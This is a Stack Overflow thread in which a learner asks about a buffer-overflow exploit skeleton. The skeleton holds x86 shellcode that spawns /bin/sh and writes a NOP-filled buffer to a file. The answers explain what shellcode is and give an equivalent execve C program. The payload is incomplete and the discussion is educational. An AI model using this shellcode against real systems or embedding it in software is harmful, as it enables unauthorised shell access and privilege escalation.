-6

i have this code

 #include <stdlib.h>
 #include <stdio.h>
 #include <string.h>
 char shellcode[]=
       "\x31\xc0"             /* xorl    %eax,%eax              */
       "\x50"                 /* pushl   %eax                   */
       "\x68""//sh"           /* pushl   $0x68732f2f            */
       "\x68""/bin"           /* pushl   $0x6e69622f            */
       "\x89\xe3"             /* movl    %esp,%ebx              */
       "\x50"                 /* pushl   %eax                   */
       "\x53"                 /* pushl   %ebx                   */
       "\x89\xe1"             /* movl    %esp,%ecx              */
       "\x99"                 /* cdql                           */
       "\xb0\x0b"             /* movb    $0x0b,%al              */
       "\xcd\x80"             /* int     $0x80                  */
     ;

    void main(int argc, char **argv)
    {
        char buffer[517];
        FILE *badfile;

        /* Initialize buffer with 0x90 (NOP instruction) */
        memset(&buffer, 0x90, 517);

        /* You need to fill the buffer with appropriate contents here */ 

        /* Save the contents to the file "badfile" */
        badfile = fopen("./badfile", "w");
        fwrite(buffer, 517, 1, badfile);
        fclose(badfile);
    }

i want to know and learn more about this kind of codes that calls expliot,what is that shell code?how can i learn to code that shells,i want to know exactly what does this code do.

Jules
  • 14,200
  • 13
  • 56
  • 101
user3620354
  • 17
  • 3
  • You want the SO community to teach you about shellcode and exploits? Good luck with that. – Jules May 17 '14 at 17:13
  • they coulnd help me, just voting my post down :) – user3620354 May 17 '14 at 17:13
  • Start by replacing `void main` with `int main`. – chris May 17 '14 at 17:14
  • 2
    You need to learn assembly then. Stack Overflow's not going to provide you with a full assembly course. You need to find books/tutorials and use those. You can ask here when you have _specific_ questions. – Mat May 17 '14 at 17:14
  • @JulesMazur i didnt want any community,:),any one can write this kind of code, he or she learned it somewhere,and then create it,but i didn;t know shell code phrase and codes, is there any place too learn that statements? – user3620354 May 17 '14 at 17:15
  • 2
    As said, SO is not a forum to post on to learn from scratch. – Jongware May 17 '14 at 17:17
  • @Jongware but here is a place that people (programmers) meet each other and share their EXPERIENCES – user3620354 May 17 '14 at 17:28
  • 2
    No, it is not. It's a forum for concrete programming related questions. Read [About SO](http://stackoverflow.com/about), as your profile suggests you have not done so yet. – Jongware May 17 '14 at 17:32

2 Answers2

2

Probably a too broad question but I'll provide some info for a novice anyway:

A shellcode is usually a series of instructions in a target-specific language that are "written" to memory and intended to be executed to gain privileges or manipulate data.

Shellcodes are extremely hardware, platform and version specific: if you have an x86 processor you'll have to target that ISA in order to get your code running once you "injected" or diverted the main program's execution to it.

Machine instructions are usually binary code (or hex, depending on how you represent the data) and to tell the machine what should it do next, you use an opcode. In the code above, you're exactly looking at opcodes which specify

  • The instruction to be executed
  • The operands on which it should be executed

That said: there's a lot you would need to learn on programming, reversing, architectures, system internals and security systems if you really want to tackle the security field.

As for what that code does: it enters a syscall and executes /bin/sh

#include <unistd.h>

void main()
{
        char *shell[2];

        shell[0] = "/bin/sh";
        shell[1] = NULL;

        execve(shell[0], shell, NULL);
}

Taken from http://www.enderunix.org/docs/en/bof-eng.txt

Good luck.

Marco A.
  • 43,032
  • 26
  • 132
  • 246
1

Page 315 of Hacking: The Art of Exploitation does a good job explaining what that code does.

Tom van der Woerdt
  • 29,532
  • 7
  • 72
  • 105